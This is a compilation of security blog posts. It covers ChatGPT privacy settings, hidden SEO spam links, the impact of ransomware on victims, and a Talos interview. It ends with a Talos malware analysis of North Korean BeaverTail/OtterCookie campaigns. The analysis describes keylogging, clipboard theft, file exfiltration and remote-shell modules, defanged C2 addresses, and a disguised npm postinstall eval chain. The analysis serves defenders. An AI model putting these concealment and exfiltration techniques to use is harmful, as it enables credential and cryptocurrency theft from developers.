Users from the European Economic Area, the UK, and Switzerland have additional rights under the GDPR. The law is in effect in European countries and regulates how companies collect and use personal data. These rights are not directly displayed on the OpenAI Privacy Portal, but they can be exercised by submitting a request through the portal, or by writing to dsar@openai.com.
How to clear your data from ChatGPT’s memory
Another critical element of privacy protection is ChatGPT’s memory. Unlike chat history, memory allows the model to recall specific details about you, such as your name, interests, preferences, and communication style. This data persists across sessions and is used to personalize the AI’s responses.
To review exactly what the AI remembers within the app, click your account name in the lower-left corner of the screen. Choose Settings, then navigate to Personalization, and select Manage memories.
Under Personalization, you can manage saved memories, temporarily disable memory, or prevent the model from referring to chat history when responding
This section displays all stored information. If you wish for ChatGPT to forget a specific detail, click the trash can icon next to that memory. Important: for a memory to be completely erased, you need to also delete the specific chat the information was saved from. If you delete only the chat but not the memory, the data remains stored.
In Personalization, you can also configure what data ChatGPT will store about you in future conversations. To do this, you should familiarize yourself with the two types of memory available in the AI:
Saved memories are fixed recollections about you, such as your name, interests, or communication style, which remain in the system until you manually delete them. These are created when you explicitly ask the chat to remember something
Chat history is the model’s ability to consider specific details from past conversations to produce more personalized responses. In this case, ChatGPT doesn’t store every detail; instead, it selects only fragments that it deems useful. These types of memories can change and adapt over time
You can disable one or both of these memory types in the ChatGPT settings. To deactivate saved memories, turn off the toggle next to Reference saved memories. To do the same for chat history, turn off the toggle next to Reference chat history.
Disabling these features doesn’t delete previously saved information. The data remains within the system, but the model ceases to reference it in new responses. To completely delete saved memories, go to the Manage memories section as described above.
The Personalization menu in the web-based version of ChatGPT is slightly different, with an additional option: Record mode. This allows the AI to reference transcripts of your past recordings when generating responses. It is possible to disable this feature within the web interface.
In addition, the web version displays a memory usage indicator, such as 87% full, which shows how much space is occupied by memories.
The web version of ChatGPT also includes a memory usage indicator under Personalization
For sensitive conversations, you can utilize special Temporary Chats, which the AI won’t remember.
How to use Temporary Chats in ChatGPT
Temporary Chats in ChatGPT are designed to resemble incognito mode in a web browser. If you want to discuss something particularly intimate or confidential with the AI, this mode helps reduce the risks. The chats are not saved in the history, they don’t become part of the memory, and they’re not used to train the models. This last point holds true for all Temporary Chats regardless of the settings selected in the Data controls section, which was discussed above.
Once a session ends, its contents disappear and cannot be recovered. This means Temporary Chats won’t appear in your history, and ChatGPT won’t remember their content. However, OpenAI warns that for security purposes, a copy of the Temporary Chat may be stored on the company’s servers for up to 30 days.
In June 2025, a court orderedOpenAI to preserve all user chats with ChatGPT indefinitely. The decision has already taken effect, and even though the company plans to appeal it, at the time of this publication, OpenAI is compelled to store Temporary Chat data permanently in a special secure repository that “can only be accessed under strict legal protocols”. This largely nullifies the entire concept of “Temporary Chats”, and confirms the old adage, “There’s nothing more permanent than the temporary”.
It’s important to note that when creating a Temporary Chat, you’re starting a conversation with the AI from a blank slate: the chatbot won’t remember any information from its previous chats with you.
To initiate a Temporary Chat in the web-based version of ChatGPT, open a new chat and click Turn on temporary chat button in the upper right corner of the page.
In the web version of ChatGPT, the Turn on temporary chat button is located in the upper right corner of the screen, and launches a new chat that won’t save any history or memory
To activate a Temporary Chat in the ChatGPT applications for macOS and Windows, click the AI model selection, and a Temporary Chat toggle will appear at the bottom of the window that opens.
In the ChatGPT app for macOS, Temporary Chat activation is available in the model selection menu
After a Temporary Chat is activated, a special screen will open, which will look slightly different in the desktop and web versions. If you see this screen, it means things are working correctly.
Temporary Chats are not saved in history, used to update memory, or utilized for model training
Integrating ChatGPT with your device applications
The ChatGPT application includes a feature named Work with Apps. This allows you to interact with the AI beyond the ChatGPT interface itself, extending its functionality into other apps on your device. Specifically, the model can connect to text editors and various development environments.
When you utilize this feature, you can receive AI suggestions and make edits directly within those apps, eliminating the need to copy text to a separate chat window. The core concept is to embed the AI into your existing, familiar workflows.
However, along with the convenience, this feature introduces privacy risks. By connecting to applications, ChatGPT gains access to the content of the files you’re working on. These files may include personal documents, work projects or reports, notes containing confidential information, and other similar content. A portion of this data may be sent to OpenAI’s servers for analysis and response generation.
Therefore, the more applications you grant access to, the higher the probability that sensitive information will be exposed to OpenAI.
No comparable list has been published for the Windows version of the app yet.
To check if this feature is currently enabled on your device, click your account name in the lower-left corner of the screen. Select Settings and scroll down to Work with Apps. If the toggle switch next to Enable Work with Apps is on, the feature is turned on.
In Work with Apps, you can check if the feature is enabled, and manage connections to installed apps
It’s important to emphasize that enabling the feature doesn’t immediately give the ChatGPT app access to the applications on your device. For ChatGPT to analyze and make changes to content in other apps, the user must explicitly grant a separate permission to each individual app.
If you’re unsure whether you’ve granted ChatGPT any access permissions, you can verify this within the same section. To do this, select Manage Apps. The window that opens will display every app on your device that ChatGPT can potentially interact with. If each app shows Requires permissions underneath it, and Enable Permission on the right, it signifies that ChatGPT currently has no access to any apps.
Manage Apps displays the apps ChatGPT can potentially access
On macOS, should you choose to grant ChatGPT access to an application, you must also enable the AI app to control your computer via the accessibility features in the system settings. This permission grants ChatGPT extensive extra capabilities: monitoring your activities, managing other applications, simulating keystrokes, and interacting with the user interface. For this very reason, these permissions are granted only manually and require the user’s explicit confirmation.
If you’re concerned about the uncontrolled sharing of your data with ChatGPT, we recommend you disable the Enable Work with Apps toggle switch and forgo using this feature.
However, if you want ChatGPT to be able to work with applications on your device, you should pay attention to the following three features, and configure them according to your personal balance of privacy and convenience:
Automatically pair with apps from chat bar allows ChatGPT to automatically connect to supported applications directly from the chat UI without requiring manual selection each time. This speeds up your workflow, but increases the risk that the model will gain access to an application that the user didn’t intend to connect it to
Generate suggested edits allows ChatGPT to propose changes to text or code within the connected application, but you’ll need to apply those changes manually. This is the safer option because the user retains control over changes being made
Automatically apply suggested edits allows the model to immediately implement changes to files. While this maximizes process automation, it carries additional risks, as modifications could be applied without confirmation — potentially affecting important documents or work projects
How to connect ChatGPT to third-party online services
ChatGPT can also be connected to third-party online services for greater customization: this allows the AI to offer more precise answers and execute tasks better by considering, for example, your email correspondence in Gmail or schedule in Google Calendar.
Unlike Work with Apps, which enables ChatGPT to interact with locally installed applications, this feature involves external online platforms like GitHub, Gmail, Google Calendar, Teams, and many others.
The exact list of available services depends on your plan. The most extensive selection is available in the Business, Enterprise, and Edu tiers; a slightly more limited set is found in Pro; and the roster of services is significantly more modest in Plus. Free users have no access to this feature. Some regional restrictions also apply. You can view the full list for all plans by following the link.
When connecting to third-party services, it’s crucial to understand exactly what data OpenAI will process, how, and for what purposes. If you haven’t disabled training on your data, information received from connected services may also be used for model training. Furthermore, with the memory option enabled, ChatGPT is capable of remembering details obtained from third-party services and utilizing them in future chats.
To view the list of online services available for connection, click your account name in the bottom left corner of the screen. Then, select Settings and, in the Account section, navigate to Connectors.
Connectors available in the ChatGPT settings
Under Connectors, you’ll see services that are already connected, as well as those that are available for activation. To disconnect ChatGPT from a service, select the service and click Disconnect.
The settings for each connector allow you to disable ChatGPT’s access to the service, view the date when it was connected, and allow or disallow the automatic use of its data in chats
To mitigate privacy risks, we recommend connecting only the absolutely necessary services, and configuring the memory and data controls within ChatGPT in advance.
How to set up secure login to ChatGPT
If you are a frequent ChatGPT user, the service likely stores significantly more information about you than even social media. Therefore, if your account is compromised, attackers could gain access to data they can use for doxing, blackmail, fraud, theft of funds, and other types of attacks.
To mitigate these risks, it’s essential to set a complex password, and enable two-factor authentication for logging in to ChatGPT. What we have in mind when we say “complex” is a password that meets all of the following criteria:
A minimum length of 16 characters
A combination of uppercase and lowercase letters, numbers, and special characters
Ideally, no dictionary words, no simple sequences like “12345” or “qwerty”, and no repeating characters
Uniqueness: a different password for each website or online service
If your current ChatGPT password doesn’t satisfy these criteria, we strongly recommend you change it. While there’s no option to change the password as such in the ChatGPT settings, you can use the password reset procedure. To do this, log out of your account, select Forgot password? on the login screen, and follow the instructions to set up a new password.
You may be tempted to use the AI model itself to generate a password. However, we don’t recommend this: our research suggests that chatbots are often not very effective at this task, and frequently generate highly insecure passwords. Furthermore, even if you explicitly ask the neural network to create a random password, it won’t be truly random, and will therefore be more vulnerable.
For additional account protection, we also recommend enabling two-factor authentication: navigate to Settings, select Security, and turn on the Multi-factor authentication toggle switch. After this, scan the QR code in an authenticator application, or manually enter the secret key that appears on the screen, and verify the action with the one-time code.
In the Security section of the web version, you can also log out of all active sessions on all devices, including your current one. Unfortunately, you cannot view the login history. We recommend using this feature if you suspect that someone may have gained unauthorized access to your account.
In the web version’s security settings, you can enable multi-factor authentication, and also log out of ChatGPT on all devices
Final tips to secure your data
When using AI chatbots, it’s important to remember that these applications create new privacy challenges. To protect our data, we now must account for things that were not a concern when setting up accounts in traditional apps and web services, or even in social media and messaging apps. We hope that this comprehensive guide to privacy and security settings in ChatGPT will help you with this tricky task.
Also, please remember to safeguard your ChatGPT account against hijacking. The best way to do this is by using an app that generates and securely stores strong passwords, while also managing two-factor authentication codes.
Kaspersky Password Manager helps you create unique, complex passwords, autofill them when logging in, and generate one-time codes for two-factor authentication. Passwords, one-time codes, and other data encrypted in Kaspersky Password Manager can be synchronized across all your devices. This will help provide robust protection for your account in ChatGPT and other online services.
If you’re looking for more information on the secure use of artificial intelligence, here are some more useful posts:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-20 10:06:432025-10-20 10:06:43How to configure privacy and security in ChatGPT | Kaspersky official blog
If your corporate website’s search engine rankings suddenly drop for no obvious reason, or if clients start complaining that their security software is blocking access or flagging your site as a source of unwanted content, you might be hosting a hidden block of links. These links typically point to shady websites, such as pornography or online casinos. While these links are invisible to regular users, search engines and security solutions scan and factor them in when judging your website’s authority and safety. Today, we explain how these hidden links harm your business, how attackers manage to inject them into legitimate websites, and how to protect your website from this unpleasantness.
Why hidden links are a threat to your business
First and foremost, hidden links to dubious sites can severely damage your site’s reputation and lower its ranking, which will immediately impact your position in search results. This is because search engines regularly scan websites’ HTML code, and are quick to discover any lines of code that attackers may have added. Using hidden blocks is often viewed by search algorithms as a manipulative practice: a hallmark of black hat SEO (also known simply as black SEO). As a result, search engines lower the ranking of any site found hosting such links.
Another reason for a drop in search rankings is that hidden links typically point to websites with a low domain rating, and content irrelevant to your business. Domain rating is a measure of a domain’s authority — reflecting its prestige and the quality of information published on it. If your site links to authoritative industry-specific pages, it tends to rise in search results. If it links to irrelevant, shady websites, it sinks. Furthermore, search engines view hidden blocks as a sign of artificial link building, which, again, penalizes the victim site’s placement in search results.
The most significant technical issue is the manipulation of link equity. Your website has a certain reputation or authority, which influences the ranking of pages you link to. For example, when you post a helpful article on your site, and link to your product page or contacts section, you’re essentially transferring authority from that valuable content to those internal pages. The presence of unauthorized external links siphons off this link equity to external sites. Normally, every internal link helps search engines understand which pages on your site are most important — boosting their position. However, when a significant portion of this equity leaks to dubious external domains, your key pages receive less authority. This ultimately causes them to rank lower than they should — directly impacting your organic traffic and SEO performance.
In the worst cases, the presence of these links can even lead to conflicts with law enforcement, and entail legal liability for distributing illegal content. Depending on local laws, linking to websites with illegal content could result in fines or even the complete blocking of your site by regulatory bodies.
How to check your site for hidden links
The simplest way to check your website for blocks of hidden links is to view its source code. To do this, open the site in browser and press Ctrl+U (in Windows and Linux) or Cmd+Option+U (in macOS). A new tab will open with the page’s source code.
In the source code, look for the following CSS properties that can indicate hidden elements:
display:none
visibility:hidden
opacity:0
height:0
width:0
position:absolute
These elements relate to CSS properties that make blocks on the page invisible — either entirely hidden or reduced to zero size. Theoretically, these properties can be used for legitimate purposes — such as responsive design, hidden menus, or pop-up windows. However, if they’re applied to links or entire blocks of link code, it could be a strong sign of malicious tampering.
Additionally, you can search the code for keywords related to the content that hidden links most often point to, such as “porn”, “sex”, “casino”, “card”, and the like.
For a deep dive into the specific methods attackers use to hide their link blocks on legitimate sites, check out our separate, more technical Securelist post.
How do attackers inject their links into legitimate sites?
To add an invisible block of links to a website, attackers first need the ability to edit your pages. They can achieve this in several ways.
Compromising administrator credentials
The dark web is home to a whole criminal ecosystem dedicated to buying and selling compromised credentials. Initial-access brokers will provide anyone with credentials tied to virtually any company. Attackers obtain these credentials through phishing attacks or stealer Trojans, or simply by scouring publicly available data breaches from other websites in the hope that employees reuse the same login and password across multiple platforms. Additionally, administrators might use overly simple passwords, or fail to change the default CMS credentials. In these cases, attackers can easily bruteforce the login details.
Gaining access to an account with administrator privileges gives criminals broad control over the website. Specifically, they can edit the HTML code, or install their own malicious plugins.
Exploiting CMS vulnerabilities
We frequently discuss various vulnerabilities in CMS platforms and plugins on our blog. Attackers can leverage these security flaws to edit template files (such as header.php, footer.php, or index.php), or directly insert blocks of hidden links into arbitrary pages across the site.
Compromising the hosting provider
In some cases, it’s the hosting company that gets compromised rather than the website itself. If the server hosting your website code is poorly protected, attackers can breach it and gain control over the site. Another common scenario concerns a server that hosts sites for many different clients. If access privileges are configured incorrectly, compromising one client can give criminals the ability to reach other websites hosted on that same server.
Malicious code blocks in free templates
Not all webmasters write their own code. Budget-conscious and unwary web designers might try to find free templates online and simply customize them to fit the corporate style. The code in these templates can also contain covert blocks inserted by malicious actors.
How do you protect your site from hidden links?
To secure your website against the injection of hidden links and its associated consequences, we recommend taking the following steps:
Avoid using questionable third-party templates, themes, or any other unverified solutions to build your website.
Promptly update both your CMS engine and all associated themes and plugins to their latest versions.
Routinely audit your plugins and themes, and immediately delete the ones you don’t use.
Regularly create backups of both your website and database. This ensures you can quickly restore your website’s operation in the event of compromise.
Check for unnecessary user accounts and excessive access privileges.
Promptly delete outdated or unused accounts, and establish only the minimum necessary privileges for active ones.
Establish a strong password policy and mandatory two-factor authentication for all accounts with admin privileges.
Welcome to this week’s edition of the Threat Source newsletter.
I count myself fortunate that I have never been on the receiving end of a ransomware attack. My experiences have been from research and response, never as a victim. It’s a tough scenario: One day you are working or minding your own business when suddenly, threatening notes appear on desktops and systems simply stop working. So much of our survival as humans is tied to our livelihoods, so the amount of stress incurred can be severe. I get it, truly.
Consequently, I am endlessly academically fascinated at stress responses and how humans… well… human during moments of adversity. A ransomware attack most certainly qualifies as adverse, and my sympathies are with you if you’ve ever had to endure one. But there’s a science to both the personal response, and the business response and its impacts writ large.
Over the past year, excellent research has been published on these facets of response to help answer some of these questions, and naturally I dove right into the research. One of the things that stuck out to me was that the impact of the attacks and its effect on small businesses as a victim segment. A notable quote from a small business in the U.K. government’s “The experiences and impacts of ransomware attacks on individuals and organisations” states:
“I’ve started to rebuild, using personal funds and living off personal funds for the last 2 or 3 years… I’ve got 0 savings left… It’s had a total impact on me… I’ve gone from probably nearly a £250,000 business down to about a £20,000 business.”
This quote isn’t unique in its impacts. Anecdotally, I can tell you small businesses are a large swath of victims for ransomware operators. It makes sense — Small victims likely pay out less but likely have lower security standards and security knowledge to defend themselves with. They also do not have the cash reserves, legal teams, or dedicated IT security staff that a mid-sized or larger business have. Simply put, they are disproportionately vulnerable.
So, what about the impacts to health and wellbeing? What, if anything, do we do? And why the hell should any business even care? To paraphrase the Royal United Services Institute (RUSI) report ‘Your Data is Stolen and Encrypted’: The Ransomware Victim Experience, ransomware victims experience trauma, exhaustion, and emotional harm that rival — and often outlast — the financial or operational damage. You can survive the battle of immediate operational harm of a cyber attack and recover your day-to-day business operations only to lose the war as your employees cope and process the trauma of the event and thus impact your business’ ability to compete and survive.
A cyber attack is both a technical and psychological crisis.Business leadership would be wise to understand this. Lead with empathy and remember that your employees look to you for leadership, especially in these incidents. People follow calm, not commands. Have an incident response plan for how you respond to the technical crises, but also for how to take care of your people. You might find yourself that much stronger at the end, both with a company that handles adversity and employees that are cared for.
The one big thing
Cisco Talos discovered a new malware campaign linked to the North Korean threat group Famous Chollima, which targets job seekers with trojanized applications to steal credentials and cryptocurrency. The campaign features two primary tools, BeaverTail and OtterCookie, whose functionalities are merging and now include new modules for keylogging, screenshot capture, and clipboard monitoring. The attackers deliver these threats through malicious NPM packages and even a fake VS Code extension, making detection and prevention more challenging.
Why do I care?
This campaign highlights how attackers use social engineering and software supply chain attacks to compromise individuals and organizations, not just targeting companies directly. If you or your organization use development tools, npm packages, or receive unsolicited job offers, you could be at risk of credential or cryptocurrency theft.
So now what?
Be vigilant when installing NPM packages, browser extensions, or software from unofficial sources, and verify the legitimacy of job offer communications. Use layered security solutions, such as endpoint protection, multi-factor authentication, and network monitoring tools like those recommended by Cisco, to detect and block these threats.
Top security headlines of the week
Harvard is first confirmed victim of Oracle EBS zero-day hack Harvard was listed on the data leak website dedicated to victims of the Cl0p ransomware on October 12. The hackers have made available over 1.3 TB of archive files that allegedly contain Harvard data. (SecurityWeek)
Two new Windows zero-days exploited in the wild Microsoft released fixes for 183 security flaws spanning its products, including three vulnerabilities that have come under active exploitation in the wild. One affects every version ever shipped. (The Hacker News)
Officials crack down on Southeast Asia cybercrime networks, seize $15B The cryptocurrency seizure and sanctions targeting the Prince Group, associates and affiliated businesses mark the most extensive action taken against cybercrime operations in the region to date. (CyberScoop)
Extortion group leaks millions of records from Salesforce hacks The leak occurred days after the group, an offshoot of the notorious Lapsus$, Scattered Spider, and ShinyHunters hackers, claimed the theft of data from 39 Salesforce customers, threatening to leak it unless the CRM provider pays a ransom. (SecurityWeek)
Can’t get enough Talos?
Humans of Talos: Laura Faria and empathy on the front lines What does it take to lead through chaos and keep organizations safe in the digital age? Amy sits down with Laura Faria, Incident Commander at Cisco Talos Incident Response, to explore a career built on empathy, collaboration, and a passion for cybersecurity.
Beers with Talos: Two Marshalls, one podcast Talos’ Vice President Christopher Marshall (the “real Marshall,” much to Joe’s displeasure) joins Hazel, Bill, and Joe for a very real conversation about leading people when the world won’t stop moving.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-16 18:07:422025-10-16 18:07:42Ransomware attacks and how victims respond
What does it take to lead through chaos and keep organizations safe in the digital age? This week, Amy sat down with Laura Faria, an incident commander at Cisco Talos Incident Response, to explore a career built on empathy, collaboration, and a passion for cybersecurity.
Laura opens up about her journey through various cybersecurity roles, her leap into incident response, and what it feels like to support customers during their toughest moments — including high-stakes situations impacting critical infrastructure.
Amy Ciminnisi: Laura, it’s great to have you on. You’re an incident commander, like Alex from last episode. When did your time at Talos start, and what did your journey here look like?
Laura Faria: My entire career, I’ve worked in many large cybersecurity vendors – endpoint vendors, firewall vendors, RAV vendors… So I’ve been in a lot of different roles, but they were mostly in sales. I was actually a Cisco employee prior to joining Talos IR. I’ve been at Cisco for a little over a year now, and Talos is one of the best places to work in Cisco, in my opinion. They have a really high reputation because everyone knows the quality of research that Talos provides our customers with.
I’d never been an incident commander before, so it was a really new position to me. But it was definitely something I was interested in, and the more I learned about what the role entailed, the more I was excited to pursue it.
AC: This is a very high-pressure role, and I’m sure you have to deal with a lot of chaos, a lot of moving parts. How do you stay focused and motivated to keep going when you’re tackling these really serious incidents for our clients?
LF: A common phrase in Talos IR is “It’s never a good day when an incident happens.” During very serious episodes, being there to help the customer feels really good, especially if you’re a people person, and especially if you’re empathetic and a lot with people’s emotions.
Recently, I had a very difficult incident where a large health care facility was seeing a lot of outages in different locations throughout the nation. Every time we saw a site outage, it was devastating because we knew what that meant. We actually had people’s lives in our hands. Although it’s a very difficult job, taking the time to look at the big picture and understand the importance of your job is really what keeps you going.
Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos!
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-16 10:06:402025-10-16 10:06:40Laura Faria: Empathy on the front lines
Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK). This group is known for impersonating hiring organizations to target job seekers, tricking them into installing information-stealing malware to obtain cryptocurrency and user credentials.
In this incident, although the organization was not directly targeted, one of its systems was compromised-likely because a user was deceived by a fake job offer and installed a trojanized Node.js application called “Chessfi.”
The malicious software was distributed via a Node.js package named “node-nvm-ssh” on the official NPM repository.
Famous Chollima often uses two malicious tools, BeaverTail and OtterCookie, which started as separate but complementary programs. Recent campaigns have seen their functions merging, and Talos has identified a new module for keylogging and taking screenshots.
While searching for related threats, Talos also found a malicious VS Code extension containing BeaverTail and OtterCookie code. Although attribution to Famous Chollima is not certain, this suggests the group may be testing new methods for delivering their malware.
Introduction
In a previous Cisco Talos blog post, we described one side of the Contagious Interview (Deceptive Development) campaigns, where the threat actor utilized fake employment websites, ClickFix social engineering techniques and payload variants of credential and cryptocurrency remote access trojans (RATs) known as GolangGhost and PylangGhost.
Talos is actively monitoring other clusters of these campaigns, which are attributed to the threat actor group Famous Chollima, a subgroup of Lazarus, and aligned with the economic interests of DPRK. This post discusses some of the tactics, techniques and procedures (TTPs) and changes in tooling developed over time by another large cluster of Contagious Interview activities. These campaigns center around tools known as BeaverTail and OtterCookie.
Famous Chollima frequently uses BeaverTail and OtterCookie, with many individual sub-clusters of activities installing InvisibleFerret, a Python based modular payload. Although BeaverTail and OtterCookie originated as separate-but-complementary entities, their functionality in some recent campaigns started to merge, along with the inclusion of new functional OtterCookie modules.
Talos detected a Famous Chollima campaign in an organization headquartered in Sri Lanka. The organization was not deliberately targeted by the attackers, but it had one of the systems on the network infected. It is likely that a user fell for a fake job offer instructing them to install a trojanised Node.js application called Chessfi as a part of a fake job interview process.
Once Talos conducted the initial analysis, we realized that the tools used to conduct it had characteristics of BeaverTail and of OtterCookie, blurring the distinction between the two. The code also contained some additional functionality we have not previously encountered.
BeaverTail and OtterCookie combine
This blog focuses on OtterCookie modules and will not provide a deep dive into well-known BeaverTail and OtterCookie functionality. While some of these modules are already known, at least one was not previously documented. The examples we show are already deobfuscated, and with the help of an LLM, the function and variable names are replaced by names that correspond to their actual functionality.
Keylogging and screenshotting module
Talos encountered a keylogging and screenshotting module in this campaign that has not been previously documented. We were able to find earlier OtterCookie samples containing the module that were uploaded to VirusTotal in April 2025.
The keylogging module uses the packages “node-global-key-listener” for keylogging, “screenshot-desktop” for taking desktop screenshots and “sharp” for converting the captured screenshots into web-friendly image formats.
The module configures the packages to listen for keystrokes and periodically takes a screenshot of the current desktop session to upload them to the OtterCookie command and control (C2) server.
Figure 1. The keylogger listens for the keyboard and mouse key presses and saves them into a file.
The keystrokes are saved in the user’s temporary sub-folder windows-cache with the file name “1.tmp” and screenshots are saved in the same sub-folder with the file name “2.jpeg”. While the keylogger runs in a loop and flushes the buffer every second, a screenshot is taken every four seconds.
Talos also discovered one instance of the module where the clipboard monitoring was included in the module code, extending its functionality to stealing clipboard content.
The keylogging data and the captured screenshots are uploaded to the OtterCookie C2 server at a specific TCP port 1478, using the URL “hxxp[://]172[.]86[.]88[.]188:1478/upload”.
Figure 2. Keystrokes saved as “1.tmp” and screenshots as “2.jpeg”, then uploaded to C2 server.
OtterCookie VS Code extension
During the search for similar samples on VirusTotal, Talos discovered a recently-uploaded VS Code extension, which may attempt to run OtterCookie if installed in the victim’s editor environment. The extension is a fake employment onboarding helper, supposedly allowing the user to track and manage candidate tests.
While Talos cannot attribute this VS Code extension to Famous Chollima with high confidence, this may indicate that the threat actor is experimenting with different delivery vectors. The extension could also be a result of experimentation from another actor, possibly even a researcher, who is not associated with Famous Chollima, as this stands out from their usual TTPs.
Figure 3. VS Code extension configuration pretends to be Mercer Onboarding Helper but contains OtterCookie code.
Other OtterCookie modules
The OtterCookie section of code starts with the definition of a JSON object that contains configuration values such as unique campaign ID and C2 server IP address. The OtterCookie portion of the code constructs additional modules from strings, which are executed as child processes. In the attack we analyzed, we observed three modules, but we also found one additional module while hunting for similar samples in our repositories and on VirusTotal.
Remote shell module
The first module is fundamental for OtterCookie and begins with the detection of the infected system platform and a virtual machine check, followed by reporting the collected user and host information to the OtterCookie C2 server.
Figure 4. Main Ottercookie module starts with machine checking and includes virtual machines check.
Once the system information is submitted, the module installs the “socket.io-client” package, which is used to connect to a specific port on the OtterCookie C2 server to wait for the commands and execute them in a loop. socket.io-client first uses HTTP and then switches to WebSocket protocol to communicate with the server, which we observed listening on the TCP port 1418.
Figure 5. socket.io-client package used for communication with C2 server.
Finally, depending on the operating system, this module periodically checks the clipboard content using the commands “pbpaste” on macOS or “powershell Get-Clipboard” on Windows. It sends the clipboard content to the C2 server URL specifically used for logging OtterCookie activities at “hxxp[://]172[.]86[.]88[.]188/api/service/makelog”.
File uploading module
This module enumerates all drives and traverses the file system in order to find files to be uploaded to the OtterCookie C2 IP address at a specific port and URL (in this case, “hxxp[://]172[.]86[.]88[.]188:1476/upload”).
This module contains a list of folder and file names to be excluded from the search, and another list with target file name extensions and file name search patterns to select files to be uploaded.
Figure 6. The list of excluded folders and patterns for files uploaded to C2.
The “interesting” file list contains the following search patterns:
While not present in the campaign Talos analyzed, this module was found while looking for similar files on VirusTotal. In addition to the targeting of cryptocurrency browser extensions by the BeaverTail code, this OtterCookie module targets extensions from a list that partially overlaps with the list of cryptocurrency wallet extensions from the BeaverTail part of the payload.
Table 1. Cryptocurrency modules targeted by OtterCookie.
The cryptocurrency module targets Google Chrome and Brave browsers. If any extensions are found in any of the browser profiles, the extension files as well as the saved Login and Web data are uploaded to a C2 server URL. In the discovered sample Talos found, the uploading C2 URL was “hxxp[://]138[.]201[.]50[.]5:5961/upload”.
OtterCookie evolution
OtterCookie malware samples were first observed by NTT Security Holdings around November 2024, leading to a blog article published in December 2024. However, it is believed that the malware has been in use since approximately September 2024. The motivation for using the name OtterCookie seems to come from the early samples that used content of HTTP response cookies to transfer the malicious code executed by the response handler. This remote code loading functionality evolved over time to include additional functionality.
However, in April 2025, Talos started seeing additional modules included within the OtterCookie code and the usage of the C2 server, mostly for downloading a simple OtterCookie configuration and uploading stolen data.
Figure 7. OtterCookie modules evolution timeline.
OtterCookie evolved from the initial basic data-gathering capabilities to more modular design for data theft and remote command execution techniques. The modules are stored within OtterCookie strings and executed on the fly.
The earliest versions, corresponding to what NTT researchers refer to as v1, contain code for remote command execution (RCE) and use a socket.IO package to communicate with a C2 server. Over time, OtterCookie modules evolved by adding code to steal and upload files, with the end goal of stealing cryptocurrency wallets from a list of hardcoded browser extensions and saved browser credentials. Targeted browsers include Brave, Google Chrome, Opera and Mozilla Firefox.
The next iteration, referred to as v2, included a clipboard stealing code using the Clipboardy package to send clipboard contents to the remote server. This version also handles the loading of Javascript code from the server slightly differently. Instead of evaluating the returned header cookie as v1, the server generates an error which gets handled by the error handler on the client side. The error handler simply passes the error response data to the eval function, where it gets executed. The loader code is small and easy to miss, and along with the risk of false positive detections, this may be why the detection of the OtterCookie loaders on VirusTotal is not very successful.
Figure 8. C2 server generates an error but the code is still executed by OtterCookie. Figure 9. OtterCookie loader error handler evaluates the response data.
The v3 variant, observed in February 2025, includes a function to send specific files (documents, image files and cryptocurrency-related files) to the C2 server. OtterCookie v4, observed since April 2025, includes a virtual environment detection code to help attackers discern logs from sandbox environments from those of actual infections, indicating a focus on evading analysis. The code also contains some anti-debugging and anti-logging functionality.
The v4 variant improves on the previous version’s code and updates the clipboard content-stealing method. It no longer uses the Clipboardy library and instead it uses standard macOS or Windows commands for retrieving clipboard content.
It is important to note that over time the difference between BeaverTail and OtterCookie became blurred and in some attacks their code was merged into a single tool.
OtterCookie v5
The campaign Talos observed in August 2025 uses the most recent version of OtterCookie, which we call v5, demonstrated by the addition of a keylogging module. The keylogging module contains code to capture screenshots, which are uploaded to the C2 server together with keyboard keystrokes.
Figure 10. Node-nvm-ssh infection path.
The initial infection vector was a modified Chessfi application hosted on Bitbucket. ChessFi is a web3-based multiplayer chess platform where players can challenge each other and bet cryptocurrency on the outcome of their matches. The choice of a cryptocurrency-related application to lure victims is consistent with previous reporting of Famous Chollima targeting.
The first sign of the attack was the user installing the source code of the application. Based on the folder name of the project, we assess with moderate confidence that the victim was approached by the threat actor through the freelance marketplace site Fiverr, which is consistent with the previous reporting. While hunting for similar samples we have also discovered code repositories that were uploaded for the victim as attachments to Discord conversations.
The infection process started with the victim running Git to clone the repository:
Figure 11. The initial infection vector.
The Development section of the application’s readme document gives instructions to developers on how to install and run the project. After cloning the repository, it states that the users should run npm install to install dependencies, which, in this campaign, also included a malicious npm package named “node-nvm-ssh”.
During the installation of dependencies, the malicious package is downloaded from the repository and installed. The npm installer parses the package.json file of the malicious package and finds instructions to run commands after the installation. This is executed by parsing the “postinstall” value of the JSON object named “scripts”. At the first glance, it seems like the postinstall scripts are there to run tests, transpile TypeScript files to Java script and possibly run other test scripts.
Figure 13. Malicious package.json file contains the instruction that will cause the malicious code to run.
However, the package.json module installation instruction “npm run skip” causes npm to call the command node test/fixtures/eval specified in the value “skip”. The default node.js loading conventions will try loading a number of file names if none of them are specifically mentioned, one of them being index.js.
The test/fixtures/eval/index.js content contains code to spawn a child process using the file “test/fixtures/eval/node_modules/file15.js”.
Figure 14. index.js spawning a child process to execute file15.js.
Eventually, file15.js loads the file test.list, which is the final payload. This somewhat complex process to reach the payload code makes it quite difficult for an unsuspecting software engineer to discover that the installation of the Chessfi application will eventually lead to execution of malicious code.
Figure 15. file15.js reads and calls eval on the content of the file test.list.
With test.list we have finally reached the last piece of the puzzle of how the malicious code is run. The test.list file is over 100KB long and obfuscated using Obfuscator.io. Thankfully, the obfuscation in this case is not configured to make the analysis very difficult and with the help of the deobfuscator and an LLM, Talos was able to deobfuscate most of its functionality, revealing a combination of BeaverTail and OtterCookie.
Standard BeaverTail functionality
There seem to be two distinguishable parts in the code. The first is associated with BeaverTail, including enumeration of various browser profiles and extensions as well as the download of a Python distribution and Python client payload from the C2 server “23.227.202[.]244” using the common BeaverTail/InvisibleFerret TCP port 1224. The second part of the code is associated with OtterCookie.
The BeaverTail portion starts with a function that disables the console logging, moving toward loading the required modules and calling functions in order to steal data from a list of browser extensions, cryptocurrency wallets and browser credentials storage.
